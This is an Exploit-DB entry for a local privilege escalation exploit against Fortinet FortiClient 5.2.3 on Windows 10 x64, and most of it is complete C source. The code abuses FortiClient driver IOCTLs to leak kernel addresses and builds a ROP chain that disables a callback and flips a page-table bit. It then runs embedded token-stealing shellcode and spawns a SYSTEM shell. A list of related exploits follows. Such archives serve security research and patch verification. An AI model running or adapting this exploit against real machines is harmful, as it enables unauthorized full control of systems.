Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation

EDB-ID: 45149 Author: sickness & mschenk Published: 2018-08-05
CVE: CVE-2015-4077... Type: Local Platform: Windows_x86-64
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Shlobj.h>

#pragma comment (lib,"psapi")

PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
	memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
	memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
	leak_buffer[0] = 0x000000001a000008;
	leak_buffer[1] = 0x0000000000000003;
	leak_buffer[4] = 0x000000001a000028;
	leak_buffer[6] = addr - 0x70;

	DWORD IoControlCode = 0x22608C;
	LPVOID InputBuffer = (LPVOID)0x000000001a000000;
	DWORD InputBufferLength = 0x20;
	LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
	DWORD OutputBufferLength = 0x110;
	DWORD lpBytesReturned;

	BOOL triggerIOCTL;
	triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
	if (!triggerIOCTL)
	{
		printf("[!] Error in the SYSCALL: %d\n", GetLastError());
	}

	ULONGLONG result = leak_buffer[0x202];
	return result;
}

ULONGLONG leakNtBase(HANDLE driver)
{
	ULONGLONG teb = (ULONGLONG)NtCurrentTeb();
	ULONGLONG thread = *(PULONGLONG)(teb + 0x78);
	ULONGLONG threadInfo = leakQWORD(thread, driver);
	ULONGLONG ntAddr = leakQWORD(threadInfo + 0x2a8, driver);
	ULONGLONG baseAddr = 0;
	ULONGLONG signature = 0x00905a4d;
	ULONGLONG searchAddr = ntAddr & 0xFFFFFFFFFFFFF000;

	while (TRUE)
	{
		ULONGLONG readData = leakQWORD(searchAddr, driver);
		ULONGLONG tmp = readData & 0xFFFFFFFF;
		/*
		printf("%llx\n", readData);
		printf("%llx\n", tmp);
		*/

		if (tmp == signature)
		{
			baseAddr = searchAddr;
			break;
		}
		searchAddr = searchAddr - 0x1000;
	}
	return baseAddr;
}

ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase)
{
	ULONGLONG PsLoadModuleListAddr = ntBase + 0x34c5a0;
	ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver);
	ULONGLONG addr = 0;
	while (1)
	{
		ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver);
		ULONGLONG name = leakQWORD(namePointer, driver);
		if (name == 0x00740072006f0046)
		{
			name = leakQWORD(namePointer + 8, driver);
			if (name == 0x0069006800530069)
			{
				addr = leakQWORD(searchAddr + 0x30, driver);
				break;
			}
		}
		searchAddr = leakQWORD(searchAddr, driver);
	}
	return addr;
}

ULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result)
{
	PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000f5ffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (fake_stack == NULL)
	{
		printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
		return 1;
	}

	memset(fake_stack, 0x41, 0x12000);
	PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000;
	DWORD index = 0;

	// <NULL Callback>
	ropStack[index] = ntBase + 0x1684ef; index++;       // pop rax ; pop rcx ; ret
	ropStack[index] = fortishield_callback; index++;    // FortiShield Callback
	ropStack[index] = 0x0000000000000000; index++;      // NULL
	ropStack[index] = ntBase + 0x937eb; index++;        // mov qword [rax], rcx ; ret
	// </NULL Callback>

	// <Flip U=S bit>
	ropStack[index] = ntBase + 0x88614; index++;        // pop rax ; ret
	ropStack[index] = pte_result; index++;              // PTE VA
	ropStack[index] = ntBase + 0x1a3cb2; index++;       // pop rdx ; ret
	ropStack[index] = 0x0000000000000063; index++;      // DIRTY + ACCESSED + R/W + PRESENT
	ropStack[index] = ntBase + 0xe8a8b; index++;        // mov byte [rax], dl ; add eax, 0x01740000 ; ret
	ropStack[index] = ntBase + 0x11e000; index++;       // wbinvd  ; ret
	// </Flip U=S bit>

	// <Restore variables & shellcode>
	ropStack[index] = 0x00000000f6000100; index++;      // Shellcode address
	ropStack[index] = fortishield_restore; index++;     // FortiShield return location
	// </Restore variables & shellcode>

	char token_steal[] = 
		"\x48\x31\xc0\x65\x48\x8b\x80"
		"\x88\x01\x00\x00\x48\x8b\x80"
		"\xb8\x00\x00\x00\x49\x89\xc0"
		"\x48\x8b\x80\xe8\x02\x00\x00"
		"\x48\x2d\xe8\x02\x00\x00\x48"
		"\x8b\x88\xe0\x02\x00\x00\x48"
		"\x83\xf9\x04\x75\xe6\x4c\x8b"
		"\x88\x58\x03\x00\x00\x4d\x89"
		"\x88\x58\x03\x00\x00\x3E\x48"
		"\x8B\x04\x24\x48\x89\xF4\x48"
		"\x83\xEC\x20\xFF\xE0";

	memcpy((fake_stack + 0x2020), token_steal, sizeof(token_steal));
	return 0;
}

ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start) 
{
	ULONGLONG result = address >> 9;
	result = result | pte_start;
	result = result & (pte_start + 0x0000007ffffffff8);
	return result;
}

int trigger_callback()
{
	printf("[+] Creating dummy file\n");
	system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt");
	printf("[+] Calling MoveFileEx()\n");

	BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING);
	if (MFEresult == 0)
	{
		printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
		return 1;
	}
	return 0;
}

int main()
{
	LoadLibraryA("user32.dll"); // Populate Win32ThreadInfo

	HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (mdare == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		return 1;
	}

	HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (forti == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		return 1;
	}

	LPDWORD hThread_id = 0;
	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&trigger_callback, NULL, CREATE_SUSPENDED, hThread_id);
	if (hThread == NULL)
	{
		printf("[!] Error while calling CreateThread: %d\n", GetLastError());
		return 1;
	}

	BOOL hThread_priority = SetThreadPriority(hThread, THREAD_PRIORITY_HIGHEST);
	if (hThread_priority == 0)
	{
		printf("[!] Error while calling SetThreadPriority: %d\n", GetLastError());
		return 1;
	}

	ULONGLONG ntBase = leakNtBase(mdare);
	ULONGLONG ntPivot = ntBase + 0x1ab3ec; // mov esp, 0xf6000000; retn;
	ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x62aeb, mdare);
	ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase);
	ULONGLONG fortishield_callback = fortishieldBase + 0xd150;
	ULONGLONG fortishield_restore = fortishieldBase + 0x2f73;
	printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase);
	printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset);
	printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase);

	ULONGLONG pte_result = get_pxe_address_64(0xf6000000, ntMiGetPteAddressOffset);
	printf("[+] PTE virtual address for 0xf6000000: %I64x\n", pte_result);
	allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, pte_result);

	DWORD IoControlCode = 0x220028;
	ULONGLONG InputBuffer = ntPivot;
	DWORD InputBufferLength = 0x8;
	ULONGLONG OutputBuffer = 0x0;
	DWORD OutputBufferLength = 0x0;
	DWORD lpBytesReturned;

	//DebugBreak();

	BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
	ResumeThread(hThread);
	WaitForSingleObject(hThread, INFINITE);
	system("start cmd.exe");

	return 0;
}


Related Exploits

Trying to match CVEs (2): CVE-2015-4077, CVE-2015-5736
Other Possible E-DB Search Terms: Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators),  Fortinet FortiClient 5.2.3,  Fortinet FortiClient
Date D V Title Author
2017-03-11 Verified Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalationsickness
2017-12-22 Waiting verification Fortinet FortiClient - Local Privilege EscalationClément Notin
2017-03-25 Verified Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalationsickness
2017-03-25 Verified Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalationsickness